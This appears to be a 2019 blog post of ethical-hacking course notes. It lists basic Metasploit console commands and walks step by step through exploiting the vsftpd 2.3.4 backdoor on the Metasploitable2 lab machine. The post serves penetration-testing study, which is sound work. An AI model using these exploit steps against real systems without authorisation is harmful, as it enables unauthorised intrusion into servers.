Ethical Hacking - GAINING ACCESS(4)

SERVER SIDE ATTACKS - METASPLOIT

Metasploit is an exploit development and execution tool. It can also be used to carry out other penetration testing tasks such as port scans, service identification and post exploitation tasks.

> msfconsole - runs the metasploit console

> help - shows help

> show[something] - something can be exploits, payloads, auxiliaries or options.

> use[something] - use a certain exploit, payload or auxiliary.

> set [option][value] - configure [option] to have a value of [value]

> exploit - runs the current task

Target: Metasploitable2

Tool: Zenmap, Metasploit on Kali Linux

Scan the target machine, and find the vsftpd. You can find the backdoor on this application.(https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor)

Exploit the target machine follow below steps.

msf > use exploit/unix/ftp/vsftpd_234_backdoor
msf exploit(vsftpd_234_backdoor) > show targets
    ...targets...
msf exploit(vsftpd_234_backdoor) > set TARGET < target-id >
msf exploit(vsftpd_234_backdoor) > show options
    ...show and set options...
msf exploit(vsftpd_234_backdoor) > exploit

Now exploit the target machine sucessfully.

posted @ 2019-12-25 21:31 晨风_Eric 阅读(89) 评论(0) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部

一蓑烟雨

该面对的绝不逃避，该执著的永不怨悔，该舍弃的不再留念，该珍惜的好好把握。

Ethical Hacking - GAINING ACCESS(4)

公告